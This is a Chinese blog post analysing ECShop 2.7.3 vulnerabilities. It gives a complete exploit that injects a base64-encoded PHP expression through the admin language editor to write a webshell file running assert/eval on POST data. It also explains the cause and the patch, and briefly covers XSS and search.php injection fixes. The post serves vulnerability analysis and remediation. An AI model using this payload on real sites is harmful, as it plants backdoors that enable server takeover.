ecshop user.php怎么注入,ECSHOP 常见注入漏洞分析和修复方法

最新推荐文章于 2024-07-18 16:43:09 发布
最新推荐文章于 2024-07-18 16:43:09 发布
阅读量540 收藏
点赞数
文章标签: ecshop user.php怎么注入

优易软件为大家整理 一些ecshop 常见注入漏洞分析和修复方法,在对ecshop使用操作上能够得到一些便利。

1.测试版本

v2.7.3 RELEASE 20121106(最新)

v2.7.3 RELEASE 20120411

2.漏洞条件

需登录到后台

3.漏洞利用

1) 登陆到台后,选择模板管理,语言项编辑,搜索“用户信息”

为什么要搜索“用户信息”,还可以搜索其它的吗?

答案是搜索languages\zh_cn\user.php文件里任何一个变量都可以

2) 添加如下后门,将用户信息改为

用户信息${${fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}

即生成一个JoyChou.php文件,内容为:<?php

assert(

$_POST[x]

);

?>

3) 访问user.php即可产生shell(不用注册登录账户)

http://localhost/ecshop_V2.7.3_UTF8_release0411/user.php

http://localhost/ECShop_V2.7.3_UTF8_release0411/languages/zh_cn/user.php

4.产生原因

在admin\edit_languages.php文件中第120行,修改变量内容,注意是用的双引号。

复制代码for ($i = 0; $i 

{

/* 语言项内容如果为空,不修改 */

if (trim($_POST['item_content'][$i]) == '')

{

unset($src_items[$i]);

}

else

{

$_POST['item_content'][$i] = str_replace('\\\\n', '\\n', $_POST['item_content'][$i]);

/* $_POST['item_content'][$i]是修改后增加的内容,即增加的"用户信息${${fputs(fopen"等内容

$dst_items[$i] 是 $_LANG['label_profile'] = "用户信息${${fputs(fopen";

*/

$dst_items[$i] = $_POST['item_id'][$i] .' = '. '"' .$_POST['item_content'][$i]. '";';

}

}

复制代码

修改完后文件\languages\zh_cn\user.php变量为:注意是双引号哦$_LANG['label_profile'] = "用户信息${${fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}";

由于是双引号,所以只要在任意的php文件中引用这个变量,代码就会成功执行。

至于为什么可以执行?原理如下:

下面这三句话都可以执行,与其说代码执行,不如说参数执行。<?php

$a = "${ phpinfo()}";  // 有一个空格

$b = "{${phpinfo()}}"; // 多一对{},但是没有空格

$c = "{${fputs(fopen("JoyChou.php", "w+"), "<?php  eval(\$_POST[1]);?>")}}";

$d = "asdf{${phpinfo()}}"; // {字符前可以随意加字符串

?>

而http://localhost/ECShop_V2.7.3_UTF8_release0411/user.php这个文件包含\languages\zh_cn\user.php 这个文件,

所以也可以代码执行。

/* 载入语言文件 */require_once(ROOT_PATH . 'languages/' .$_CFG['lang']. '/user.php');

5.漏洞修复

了解了漏洞原理后,修复就是一件比较简单的事情,只需将双引号改为单引号

修改\admin\edit_languages.php

// 修复前$dst_items[$i] = $_POST['item_id'][$i] .' = '. '"' .$_POST['item_content'][$i]. '";';

// 修复后,由于想在单引号之间出现单引号,必须使用转义。$dst_items[$i] = $_POST['item_id'][$i] .' = '. '\'' .$_POST['item_content'][$i]. '\';';

再次访问http://localhost/ECShop_V2.7.3_UTF8_release0411/user.php已经不能生成JoyChou.php,代码没能得到执行。

Ecshop pages.lbi.php Xss漏洞,search.php注入漏洞,Ecshop version XSS漏洞

6.Ecshop pages.lbi.php Xss漏洞

先来分析这个漏洞的原因:

直接访问temp/compiled/pages.lbi.php时,浏览源文件,会发现如下代码:

显然这个form是不完全的。当构造这样的url访问时,会造成在客户端执行代码:temp/compiled/pages.lbi.php/”

很显然,这个漏洞的原理就是闭合了这个form再在客户端执行javascript.

然后分析出现不闭合form的原因,打开page.lbi.php文件,可以看到如下代码

” method=”get”> <?php  if ($this->_var[‘pager’][‘styleid’] == 0): ?>

这里执行$this的时候就出现错误了,,因为没有进行template的初始化。

既然找到原因了,下面给出解决办法:

打开page.lbi文件,在第二行插入如下代码:<?php  if (!defined(‘IN_ECS’)) { die(‘Hacking attempt’); } ?>

7.search.php注入漏洞

search.php

大概300 源if (is_not_null($val) )

修改为if (is_not_null($val) && is_numeric($key))

就可以了

8.Ecshop version XSS漏洞

打开/admin/receive.php文件中,搜索如下代码:$version=$_GET[‘version’];

修改为如下代码:$version=Htmlspecialchars($_GET[‘version’]);

勃斯李
关注
[ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入
qq_51577576的博客
10-01 1756
[ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入ECShop是上海商派网络科技有限公司(ShopEx)旗下——B2C独立网店系统,适合企业及个人快速构建个性化网上商店,系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。
[ vulhub漏洞复现篇 ] ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 xianzhi-2017-02-82239600
qq_51577576的博客
09-25 1250
[ vulhub漏洞复现篇 ] ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 xianzhi-2017-02-82239600 ECShop是一个B2C独立商店系统,供公司和个人快速建立个性化的在线商店。该系统是基于PHP语言和MYSQL数据库体系结构的跨平台开源程序。在2017年及之前的版本中,存在一个SQL注入漏洞,该漏洞可能会注入有效载荷并最终导致代码执行漏洞。最新版本的3.6.0已修复漏洞,vulhub使用其最新版本2.7.3和3.6.0非最新版本来重现该漏洞
360提示[严重]Ecshop会员中心XSS漏洞修复.txt
02-02
360提示[严重]Ecshop会员中心XSS漏洞修复.txt 360提示[严重]Ecshop会员中心XSS漏洞修复.txt 360提示[严重]Ecshop会员中心XSS漏洞修复.txt
ecshop漏洞user.php,ECShop 2.x 3.0代码执行漏洞分析
weixin_31240035的博客
03-23 719
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。0x00 前言ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。2.x版本跟3.0版本存在代码执行漏洞。0x01 漏洞原理ECShop 没有对 $GLOBAL[‘_SERVER’][‘HTTP_REFERER’] 变量进行验证,导致用户可以将任意代码插入的u...
ecshop 2.x/3.x SQL注入/代码执行
最新发布
qq_23003811的博客
07-18 274
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞注入恶意数据,最终导致任意代码执行漏洞,其3.6.0最新版已修复漏洞。3、在Referer处修改payload。1、漏洞发生是在会员登录页面。2、生成payload的脚本。
Web漏洞-SQL注入:ECShopuser.php文件中的display函数的模版变量可控,导致注入远程代码执行高危漏洞
奋斗的蜗牛
01-02 1350
ecshop项目,最近服务器上的文件user.php莫名其妙的丢失,或者被篡改,找了一大圈原因,web文件杀毒后,提醒有高危漏洞 网上找到原因,漏洞影响 ECShop全系列版本(包括2.x、3.0.x、3.6.x)均存在该远程代码执行漏洞。阿里云态势感知数据研究中心监控的数据显示,该漏洞利用难度低,影响面广,并已经发现有批量入侵迹象,需要存在相关业务的用户及时关注并进行修补。 专家建议 ...
ecshop user.php老被入侵,解决ECSHOP提示“用户名已经存在,请重新输入”
weixin_39762001的博客
03-19 291
今天客户出现个奇怪问题,无论输入什么会员都提示用户名已存在。按照往常经验,大部分是语言编码出错引起,查询user.php ,以及语言包,lib_transport.php 均无发现异常。随即度娘:结果如下:首先ecshop整合过uc,那么他是用ucenter即$user->check_user($username) 来验证会员是否ecshop注册过,是否存在,如果没有整合好uc,必然报错其次...
ecshop漏洞user.php,ECShop 2.7.2 最新任意用户登陆漏洞
weixin_26804345的博客
03-23 357
由于最近项目需要, 查看了下商派最新发布的ecshop 2.7.2正式版的源代码, 没想到在看到第二个文件时就发现了一处比较明显, 且低级漏洞。这个漏洞可以让任何人以任何用户身份登录到ECShop前台!漏洞的影响ECShop 2.7.2ECShop 2.7.1 不受影响漏洞的出现漏洞出现在/include/init.php文件的512行左右, 代码如下:ecshop 2.7.2 最新任意用户登录漏...
ecshop漏洞复现分析
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-17 1425
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 ecshop漏洞复现分析我看seebug上关于它的漏洞有好多。 xianzhi-2017-02-82239600(SQL注入/远程代码执行) 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二次漏洞”,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了
ecshop全系列SQL注入漏洞分析
d59hao的博客
05-04 299
referer值未加判断直接引用,可被攻击者控制输入利用_echash = “554fcae493e564ee0dc75bdf2ebf94ca” 为定值进行切分,构造payload利用反序列化漏洞,构造payload,传输恶意代码insert_ads函数的SQL拼接不规范导致存在SQL注入make_val函数拼接字符串输入,_eval中调用用户输入通过eval最终导致任意命令执行。
Ecshop漏洞修复
欣馨密语
05-11 1413
ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库。 路径:/api/client/includes/lib_api.php 参照以下修改: function API_UserLogin($post) { /* SQL注入过滤 */ if (get_magic_...
Ecshop2.7.3[已打2.7.3漏洞补丁].ra
04-02
从官方下载源码包,也已经修复了最新的漏洞
ecshop漏洞user.php,ECSHOP 漏洞重放及屏蔽规则
weixin_28903391的博客
03-23 434
ECSHOPuser.php文件存在文件上传漏洞测试:域名改为自己的哟!curl -sI "http://www.xxxxxx.com/user.php?act=login" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) huaxiaspider/1.0 (https://www.xxxx.cn/spider.html)" --referer "5...
ecshop user.php怎么注入,分析ecshop中$user对象
weixin_39989875的博客
03-11 165
比如user.php中,有一条$user->login($username, $password).这里的$user就是来自includes/init.php中的 $user = & init_users();而inti_user函数又在lib_common.php中,他里面有一段非常经典的代码。include_once(ROOT_PATH . 'includes/modules...
ecshop user.php怎么注入,ecshopuser.php开发user表加字段
weixin_42501035的博客
03-11 170
ecshopuser表加个字段,打开user.php发现有个$user,其中它有很多方法,像登陆,注册,退出。都要用到它。可找了大半天也找不到这个函数调用的是哪个类。又坚持找了半天,发现$user在init.php中有个这样的方法$user = & init_users(); 接着往下找,在lib_common.php中发现了init_users()这个函数:代码如下include_o...
关于ecshop的mobile里user.php登录和注册验证码不显示
weixin_30879833的博客
04-13 223
在做ecshop模板的时候由于user.php里的登录和注册是在一个页面里切换的,这就致使这里的登录和注册里的验证码不显示 找到mobile/themesmobile/ecshoptemplate_mobile下user_passport.dwt文件 首先将下面的内容去掉<script> $().ready(function(){ //登录切换 ...
ecshop 全系列版本网站漏洞 远程代码执行sql注入漏洞
网站安全专家
09-13 2570
ecshop漏洞于2018年9月12日被某安全组织披露爆出,该漏洞受影响范围较广,ecshop2.73版本以及目前最新的3.0、3.6、4.0版本都受此次ecshop漏洞的影响,主要漏洞是利用远程代码执行sql注入语句漏洞,导致可以插入sql查询代码以及写入代码到网站服务器里,严重的可以直接获取服务器的管理员权限,甚至有些网站使用的是虚拟主机,可以直接获取网站ftp的权限,该漏洞POC已公开,使用...
user.php漏動,PHPDrive权限提升漏洞
weixin_29811891的博客
04-02 370
发布日期:2012-12-30发布作者:zxsk2222漏洞类型:权限提升漏洞描述:PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等简单分析了一下代码,文件 includes/user.lib.php[php]行87function get_ip() {if(isset($_SERVER["HTTP_X_FORWARDE...
ecshop中$user对象
ufan94的博客
11-22 473
ecshop
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值